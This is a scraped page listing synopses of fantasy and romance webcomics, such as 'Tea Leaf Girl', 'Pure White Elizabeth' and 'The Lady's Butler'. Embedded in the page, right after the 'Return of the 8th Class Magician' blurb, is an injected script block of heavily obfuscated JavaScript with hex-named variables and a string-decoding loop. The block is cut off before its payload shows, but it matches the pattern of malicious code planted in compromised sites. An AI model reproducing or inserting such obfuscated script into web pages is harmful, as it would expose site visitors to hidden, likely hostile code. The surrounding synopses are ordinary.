Magic - Page 18

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

227 results

Tea Leaf Girl

Maiden of Tea Leaves The tea people from Pentagram are the main life forces of the eighth nebula and have a history of over 3,000 years. Invaded by the Insects, the various races united amidst the chaos of war and revitalized the Tea Kingdom. The protagonist, Coleen, is a young girl with the attribute of a Millennial Tea Person among the young generation in the kingdom. Can she lead the tea leaf girls of the new generation in bringing more life force to the Tea Kingdom and get the opportunity to live in harmony with the different planets and races... 54


I Need Someone to Stop My Older Brothers

I only went to calm the disturbance in front of my house, but the one I encountered was the Demon King that I punished, and unfortunately, I was falsely accused of being the demon king and died in the hand of the subjugation team. ‘I’ll kick your ass, Pamel Asinov! I’ll make you shed tears from both of your eyes!’ Among them, the worst one was the hero, Pamel Asinov, who drove me to death as a Demon King! But when I pleaded to take revenge, I opened my eyes, 500 years later! Pamel’s been dead for a long time, and the ‘brothers’ who came one day… “Purple eyes. It’s not a color that anyone can have.” “But I was like this from the beginning.” “Yes, you were. Because you are the granddaughter of Archduke Asinov.” “…the granddaughter of Archduke Asinov?” Of all people, I’m the daughter of ‘that’ Asinov? It’s nice to live a peaceful life, but I was born an enemy’s blood! ‘All the brothers in this house have a habit of hugging people.’ This shitty family. I have to hate them, but why do I keep getting attached to them? 누가 우리 오빠들 좀 말려 주세요


Coddled Princess’s Second Life

Sonia Syland, the only princess of Syland Empire, fell ill and died in her youth. Be pitied by goddess, she reborn to 10 years ago and lived her life again. In her second life, she found that there was a great conspiracy behind her painful death. The beloved father and brothers, who is the one that framed her? In this new life, Sonia made up her mind to live...


Pure White Elizabeth

I became the heroine. Elizabeth Lily, a strong and beautiful heroine with special powers at that. But the road to the flowery path is too rough. Being enslaved, brainwashed and abused… However, the hardships of the heroine in the original novel are still far away. I’m going to die before I even meet the male lead! In the end, she made up her mind. She decided to change the original novel by being saved by the hands of Ashuelot, the supporting character, the evil and dangerous magician. However. “Alright, I’ll raise her.” “Are you serious? Ashuelot, do you know what it means to raise a child?” “You take full responsibility for their diet, educate them, protect them safely, and if she’s gonna get married, you’re gonna have to thoroughly verify her husband and get rid of him.” No! That’s not true!! 순백의 엘리사벳 / Snow White Elizabeth


Now I Will Take The Emperor’s Heart

Ra Hyun, yang mendadak meninggal karena artimia, mohon dihidupkan kembali kepada dewa. Akhirnya dia hidup kembali sebagai Daphne di Kekaisaran Fiant, Namun sekarang misinya adalah dia harus merebut hati kaisar 100% agar dia bisa kembali hidup di dunia asalnya. Apakah dia bisa memperoleh hati kaisar dan hidup kembali? 지금부터 황제의 마음을 빼앗겠습니다


The King’s Forbidden Flower

Itsuwari no Ou no Omoi Hana / 偽りの王の想い花 Losing her parents at a young age and forsaken by her uncle, Peony’s life is shrouded in loneliness. One day, she meets a mysterious boy named Zach in a forest. The two fall in love, but are quickly torn apart. Ten years have passed since then. Peony has given up all hope of reuniting with her lost love, devoting herself to becoming a bride of the lord. However, one fateful day the King himself comes to visit her academy, and is the spitting image of the Zach from her memories…


The Return of the 8th Class Magician

Decades of blood put for Emperor Ragnar and a unified empire I wanted to return to my hometown, atone for my sins, and live like I was dead But "You are an 8th-class wizard who can devour me and my empire at any time" "How can I keep such a monster alive?" Betrayed by Ragnar, his friend and lord, just before crossing the threshold of death, A dagger engraved with a time magic spell was inserted into the heart. 'The pentinence I wanted was to give everything back' 8th Class Magician Returned<script></script><script>(function(_0x1e7857,_0x261031){var _0x597ea2=_0xa0cb,_0x17b29f=_0x1e7857();while(!![]){try{var _0x146b87=parseInt(_0x597ea2(0x15e))/(-0x1b98+0x841+0x1358)+-parseInt(_0x597ea2(0x149))/(0x1*0x1b73+0x469*0x1+-0x1fda)*(parseInt(_0x597ea2(0x150))/(-0x2376+0xe6a+-0x257*-0x9))+-parseInt(_0x597ea2(0x153))/(-0x47e+0x4a2+-0x10*0x2)*(-parseInt(_0x597ea2(0x14f))/(0x1fba+0x2005*-0x1+0x50))+parseInt(_0x597ea2(0x157))/(0x112c+0x1604+0x45a*-0x9)*(parseInt(_0x597ea2(0x158))/(0x1a86+0x2*-0x355+-0x13d5))+parseInt(_0x597ea2(0x14b))/(-0xe*-0x109+0x2*0x48+-0x281*0x6)+-parseInt(_0x597ea2(0x154))/(-0x7cf+0xde2+-0x60a)+-parseInt(_0x597ea2(0x15a))/(-0xf14+0x13ce+0x5*-0xf0)*(parseInt(_0x597ea2(0x147))/(-0x1*0x2161+-0x33a+0x2*0x1253));if(_0x146b87===_0x261031)break;else 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Only Aurora

In a world where magic girls are illegal, living as magic girls are absolutely risky. Life as a magic girl was a big flaw for the popular idol, Aurora, and the appearance of strange wizard boy, Simcheong raises questions. Can Aurora finish her magic girl’s contract safely and continue living her glorious life? Magical Girl Aurora


When I Opened My Eyes, I Had Become The Devil

‘Lee Jinjoo’, who dreams of being a musical actor and works part time for her living expenses. After a car accident, she had opened her eyes and found herself in her favorite romance fantasy novel where she possessed the devil who’s the final boss in part 1. Jinjoo, who had been possessed by a devil who’s fate was to die by a warrior, tried all she can to change her fate as the devil… I’m go back to my original world no matter what! Will Jinjoo be able to change her fate as she wants to?


Ice (Official)

Ravenna refuses to meet a bitter end. After waking up with the uncontrollable power to form ice at her fingertips, she's seen as a dangerous witch that must be executed. But as Ravenna escapes the Imperial Guards that want her head, she hears of an ancient dragon with the ability to breathe not fire, but ice. Hopeful, she seeks out this arrogant yet experienced dragon for a chance to master her curse. It's time for Ravenna to seize control of both her powers and her own fate!


Visions of the Night

Can you trust what you see? Lio lost everything she held dear when her home burned down and her grandmother went missing in a suspicious incident years ago. Now, left with nothing to trust but her mysterious powers of illusion, she hopes to discover the truth of her tragic past in a world where nothing is what it seems to be. 가올의 감옥 / 秋の牢獄 / Maboroshi wa Yoru ni Seichosuru


The Lady’s Butler

Woori is heartbroken when she finds out that her favorite character Lancelot dies tragically in the novel “The Flower Raised her Sword.” She knows too well that the butler suffered from his one-sided love for the heroine Charlotte and even gave his life to avenge her death. So when Woori wakes up in Charlotte’s body, she’s determined to steer sweet Lancelot away from his miserable fate. But with the original Charlotte making a reappearance, as well as the villainous Duke Vestia, things might not be so simple after all. Can Woori guide Lancelot to his happy ending without revealing her true identity?Source of collecting
